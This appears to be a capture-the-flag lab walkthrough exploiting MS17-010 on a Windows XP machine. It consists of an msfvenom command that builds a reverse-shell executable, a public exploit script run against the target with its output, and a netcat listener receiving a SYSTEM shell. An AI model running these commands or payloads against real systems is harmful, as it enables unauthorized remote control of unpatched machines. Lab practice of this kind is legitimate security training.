4 MS-17-010
Using https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.14.2_443.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: rev_10.10.14.2_443.exe
$ python send_and_execute.py 10.10.10.4 rev_10.10.14.2_443.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81e8c358
SESSION: 0xe17fbee8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe181a030
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe181a0d0
overwriting token UserAndGroups
Sending file SPYS8Z.exe...
Opening SVCManager on 10.10.10.4.....
Creating service zNQc.....
Starting service zNQc.....
The NETBIOS connection with the remote host timed out.
Removing service zNQc.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.4] 1030
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Last updated